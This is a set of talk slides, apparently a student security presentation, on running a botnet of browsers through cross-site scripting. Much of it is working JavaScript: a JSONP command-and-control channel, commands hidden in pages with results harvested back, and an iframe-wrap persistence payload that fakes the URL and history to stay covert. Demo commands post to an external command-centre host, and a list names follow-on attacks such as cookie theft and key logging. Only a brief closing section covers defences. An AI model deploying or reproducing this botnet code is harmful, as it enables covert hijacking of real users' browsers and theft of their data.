XSS Botnet

Luke Tsekouras
luke.tsekouras@gmail.com


What's that?


XSS

Execution of attacker-controlled JavaScript in a victim's browser, inside the origin of a website they are using

Botnet

A large number of computers (here, browsers) under your command



My Goals


  • Stick to the Standards
  • Remote Control
  • Client Persistence
  • Being Covert


Let's skip to the demo




Dear demo Gods,
fuck you.



So, who wants to join my botnet?


Use Incognito Mode

http://weill.cse.unsw.edu.au:2685/
Look for Spongebob

copy pasta

Say Hi
queue 100, hi: false, -> alert 'o hai there!'; ___.save hi: true
Filter by OS
queue 100, boo: false, OS: 'Linux', -> alert 'boo'; ___.save boo: true
Perform actions
queue 100, thing: false, -> $audio = ___.$('<audio autoplay src="http://soundbible.com/grab.php?id=1542&type=mp3"></audio>').appendTo('body'); ___.$('iframe').contents().click(-> $audio[0].play()); ___.save thing: true
queue -> ___.$.ajax url: 'http://weill.cse.unsw.edu.au:2685/talk/http%3A%2F%2F3.bp.blogspot.com%2F-9XnJMfXnlO4%2FT0CcyoAekpI%2FAAAAAAAAnHo%2F3-kUYndhly8%2Fs1600%2FDSCN4873.JPG', type: 'POST', data: talk: 'kekeke'



Stick to the Standards


  • No bug exploitation
  • Cross-platform - jQuery
  • Future-proof


Remote Control



Two approaches


  • JSONP
  • Embedded commands


Remote Control



JSONP

  • Circumvents the same-origin policy: a <script src> may point at any origin, and the browser runs whatever comes back
  • Requires a command centre to serve the script
<script src="http://some.external.site/some/action?name=value"></script>
The command centre's response is JavaScript that calls a function the page already defines:
returnValue('{"the":"data"}');
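The JSONP channel above, as an added example that is not the talk's code: the bot registers a callback, builds the script URL, and the command centre answers with code that calls it. The command centre, the script loading and the script execution are simulated in-process (assumptions) so it runs offline in Node; a real bot would append a `<script>` element and let the browser do the last two steps.

```javascript
// Added example, not the talk's code: a JSONP-style command poll with the
// command centre simulated in-process so it runs offline in Node.
let counter = 0;

// Bot side: pick a fresh global callback name and build the script URL.
// Nothing in the same-origin policy stops <script src> from being cross-origin.
function buildPollUrl(base, botId) {
  const cb = `cb_${counter++}`;
  return { url: `${base}?bot=${encodeURIComponent(botId)}&callback=${cb}`, cb };
}

// Results cannot be POSTed through a <script> tag, so they ride in the query
// string of the next script request (size-limited, hence the base64).
function buildResultUrl(base, botId, cmdId, result) {
  const b64 = Buffer.from(String(result), 'utf8').toString('base64');
  return `${base}?bot=${encodeURIComponent(botId)}&cmd=${cmdId}&r=${encodeURIComponent(b64)}`;
}

// Hypothetical command centre: answers with JavaScript that calls the named
// callback. Because the response is code, not data, the server may also ship
// arbitrary statements before or after the call.
function fakeCommandCentre(url) {
  const params = new URL(url).searchParams;
  const cb = params.get('callback');
  const cmd = { id: 7, js: "document.title = 'o hai'" }; // constructed sample command
  return `${cb}(${JSON.stringify(cmd)});`;
}

// Stand-in for the browser evaluating the fetched script in global scope:
// the callback name becomes a parameter so the response body runs unchanged.
function executeScript(src, cbName, cbFn) {
  return new Function(cbName, src)(cbFn);
}

// One poll: register the callback, "load" the script, hand back what arrived.
function pollOnce(base, botId) {
  const { url, cb } = buildPollUrl(base, botId);
  let received = null;
  executeScript(fakeCommandCentre(url), cb, (payload) => { received = payload; });
  return { url, received };
}
```

The point to take from `executeScript` is that the bot never parses anything: the response is executed, so the command centre is free to send whole scripts rather than data, which is also why a `script-src` restriction in a Content Security Policy closes this channel.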


Remote Control



Embedded Commands

  • Commands left within the page
  • Results can take command's place
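The embedded-command approach, as an added example (not the talk's code): commands are hidden in the page wherever the stored payload can write, each bot runs what it finds and writes the result back in the command's place. It works on the page as a string so it runs offline in Node; the marker format `<!--cmd:ID:BASE64JS-->` and the result format are assumptions.

```javascript
// Added example, not the talk's code: the embedded-command channel over an
// HTML string. In a page the same scan would walk the DOM's comment nodes.
const CMD_RE = /<!--cmd:(\d+):([A-Za-z0-9+\/=]+)-->/g;
const RES_RE = /<!--res:(\d+):([A-Za-z0-9+\/=]*)-->/g;

const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');
const unb64 = (s) => Buffer.from(s, 'base64').toString('utf8');

// Attacker side: a command is just an HTML comment placed wherever the
// stored-XSS payload can write (a profile field, a comment, ...).
function encodeCommand(id, js) {
  return `<!--cmd:${id}:${b64(js)}-->`;
}

// Bot side: find every command, run it, and put the result where the command
// was, so whoever fetches the page next reads results instead of commands.
// `run` is the executor; in a page it would be (js) => new Function(js)().
// Errors are reported back as results rather than swallowed.
function processEmbeddedCommands(html, run) {
  const results = [];
  const out = html.replace(CMD_RE, (_m, id, enc) => {
    let result;
    try {
      result = String(run(unb64(enc)));
    } catch (e) {
      result = `ERR:${e.message}`;
    }
    results.push({ id: Number(id), result });
    return `<!--res:${id}:${b64(result)}-->`;
  });
  return { html: out, results };
}

// Attacker side again: harvest the results back out of the page.
function collectResults(html) {
  const found = [];
  for (const m of html.matchAll(RES_RE)) {
    found.push({ id: Number(m[1]), result: unb64(m[2]) });
  }
  return found;
}
```

Unlike JSONP this needs no command centre of its own: the vulnerable site stores both the commands and the results, so there is no external host to trace.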


Client Persistence



Two approaches

  • IFrame wrap
  • AJAX swap


Client Persistence



IFrame Wrap

  • Seamless and bad-ass
  • Broken by frame protection (X-Frame-Options, frame-busting scripts)


Client Persistence



AJAX Persistence

  • Intercepts every link click and form submit, fetches the target with AJAX and swaps it into the current document
  • A bit buggy


Being Covert


  • Seamless iFrame swap
  • Keep the address bar URL in step with the framed page
  • Back/Forward buttons work
  • Busy cursor (hourglass) on loads, as a real navigation would show
  • Intercept form POSTs so they go through the swap too (AJAX version)
  • All commands/results are RSA encrypted
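The IFrame Wrap from the Client Persistence slides together with the URL and Back/Forward points above, as an added example (not the talk's code): the payload replaces the page body with a full-window frame of the same URL and mirrors the frame's navigations into the outer window's history. The window object is passed in (an assumption made so the function can run under Node against a stub); in a page the payload would call `installIframeWrap(window)`.

```javascript
// Added example, not the talk's code: iframe-wrap persistence with the
// address bar, title and history kept in step with the framed page.
function installIframeWrap(win) {
  // The framed copy of the page carries the same payload; it must not wrap
  // itself again or we get frames all the way down.
  if (win.top !== win) return null;

  const doc = win.document;
  const frame = doc.createElement('iframe');
  frame.setAttribute('style', 'position:fixed;top:0;left:0;width:100%;height:100%;border:0');
  frame.src = win.location.href;

  // Every navigation inside the frame: mirror its URL into the outer history
  // (so the address bar and Back/Forward look right) and copy its title.
  frame.addEventListener('load', () => {
    let href, title;
    try {
      href = frame.contentWindow.location.href; // throws once the frame leaves our origin
      title = frame.contentWindow.document.title;
    } catch (e) {
      return; // cross-origin page: nothing to mirror, and the payload is gone from it anyway
    }
    if (href !== win.location.href) win.history.pushState({ href }, title, href);
    doc.title = title;
  });

  // Back/Forward on the outer window: re-point the frame at the stored URL.
  // The browser has already moved win.location for us, so the resulting
  // load event sees matching URLs and pushes nothing.
  win.addEventListener('popstate', (ev) => {
    if (ev.state && ev.state.href) frame.src = ev.state.href;
  });

  // Replace the visible page with the frame; the payload keeps running in the
  // outer document for as long as the user browses inside the frame.
  doc.body.innerHTML = '';
  doc.body.appendChild(frame);
  return frame;
}
```

If the site sends X-Frame-Options (or a CSP frame-ancestors directive) the frame simply never loads and the user is left looking at an empty outer page, which is the "vulnerable to frame protection" point from the slide.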


Being Covert


Could've been a bit sneakier


  • Obvious bugs in AJAX mode
  • Command Centre is traceable
    • Solution: DNS Fast-flux


Potential Attacks


  • Stealing cookies
  • Key logging
  • Request sniffing
  • Link swapping
  • Cross-Site Request Forgery
  • Distributed computing
  • People power


Defence Against the Dark Arts



  • Content Security Policy (refuses inline scripts and off-site script src, which kills the injected payload and the JSONP channel)
  • X-Frame-Options (refuses to load the site in a frame, which kills the IFrame wrap)
  • Cross-Site Request Forgery Protection



Thanks


Feel free to contact me at
luke.tsekouras@gmail.com

And check out the code at
